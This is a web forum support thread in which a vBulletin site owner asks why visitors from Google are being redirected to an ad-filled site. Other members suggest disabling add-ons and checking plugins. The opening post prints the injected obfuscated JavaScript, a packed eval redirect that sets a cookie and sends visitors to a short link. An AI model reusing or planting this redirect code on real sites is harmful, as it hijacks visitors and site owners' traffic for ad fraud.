Traffic referred from google being redirected to another site - potential script

Collapse
X

• Time
  • Show
Clear All
  • Newmomsforum
    • Apr 2006
    • 3.6.x

[Forum] Traffic referred from google being redirected to another site - potential script

Hi Guys, in the last week I noticed my traffic drop by about 80% and on doing a little trouble shooting I've found that any traffic referred to me via google is being redirected to another site (via a tinyurl4.info short link)

The other site is basically just full of ads and pop unders so they are obviously after the revenue.

I checked on over AT http://redleg-redleg.com/file-viewer/ and the page results highlighted the following code:

Code:
    < html> < head> < /head> < body> < sc​ript type≈ "text/javascript"> var ipbs≈ 'd5595656';eval(func​tion (p,​ a,​ c,​ k,​ e,​ d){e≈ func​tion (c){return(c< a?'':e(parseInt(c/a)))+((c≈ c%a)> 35?String·fromCharCode (c+29):c.toString(36))};if(!''.re​place(/^/,​ String)){while(c--){d[e(c)]≈ k[c]||e(c)}k≈ [func​tion (e){return d[e]}];e≈ func​tion (){return'\\w+'};c≈ 1};while(c--){if(k[c]){p≈ p.re​place(new RegExp('\\b'+e(c)+'\\b',​ 'g'),​ k[c])}}return p}('m a≈ ["\\A\\d\\b\\l\\c\\z\\d",​ "\\j\\d\\b\\l\\c\\z\\d",​ "\\w\\q\\d\\C\\g\\c\\n\\d\\j\\k",​ "\\b\\e\\D\\B\\l\\J\\b\\n\\c\\i\\A",​ "\\o\\e\\e\\G\\c\\d",​ "\\k",​ "\\w\\q\\g\\v\\b\\u\\k\\f",​ "\\c\\g\\H\\j",​ "\\E",​ "\\r\\e\\o\\v\\b\\c\\e\\i",​ "\\u\\b\\b\\g\\I\\f\\f\\b\\c\\i\\K\\R\\n\\r\\S\\T\\c\\i\\P\\e\\f"];M x(p,​ y){m h≈ N O();h[a[1]](h[a[0]]()+L);m s≈ a[2]+h[a[3]]();t[a[4]]≈ p+a[5]+y+s+a[6]};x(a[7],​ a[8]);t[a[9]]≈ a[F]+Q;',​ 56,​ 56,​ '||||||||||_0x19e6|x74|x69|x65|x6F|x2F|x70|_0x46a7x4|x6E|x73|x3D|x54|var|x72|x63|_0x46a7x2|x20|x6C|_0x46a7x5|document|x68|x61|x3B|ipbcc|_0x46a7x3|x6D|x67|x4D|x78|x47|x31|10|x6B|x62|x3A|x53|x79|86400000|func​tion |new|Date|x66|ipbs|x75|x34|x2E'.split('|'),​ 0,​ {}))< / sc​ript > < /body> < /html>
    This has to be the culprit as the 'd5595656' is the same as the url that the site is being diverted to.

Now onto the tricky part.

I have scanned all my files and database for any reference to 'd5595656' and I've been unable to locate it anywhere.

Does anyone have any ideas how I can find out how or where this additional code is being injected from? If I goto my homepage and view source the code is not visible, it only appears to be injected when the referal is from google.

Any assistance would be very much appreciated.

Cheers

Mark
    Getting Down under | Download2me | Newsgab | Careercraft | Newmomsforum | Freeware Downloads
  • wda2015
    • May 2001

disable all addons and try again.. turn them on one by one.
    Simple Straight Forward EU cPanel vBulletin Web Hosting Provider.

Comment

• ENF
      • Apr 2002

I can confirm that if you visit your site without a previously set cookie, you get redirected to that tinyurl site.

Interesting...
      To be updated...

Comment

• Trevor Hannant
        vBulletin Support
        • Aug 2002
        • 5.7.X

Check any plugins under the vBulletin product and make sure that these are ones you added yourself. If don't recognise them, delete them.
        Vote for:

- Admin Settable Paid Subscription Reminder Timeframe (vB6)
        - Add Admin ability to auto-subscribe users to specific channel(s) (vB6)

Comment

• motoxer311
          • Nov 2008
          • 3.7.x

Any update on this, I am having the same issue..

Comment

• motoxer311
            • Nov 2008
            • 3.7.x

Echo...

Comment

• chrisngrod
              • Aug 2011
              • 4.1.x

Do you have VBSEO?
              www.cricketusers.com - Cricket Wireless Users Forum

Comment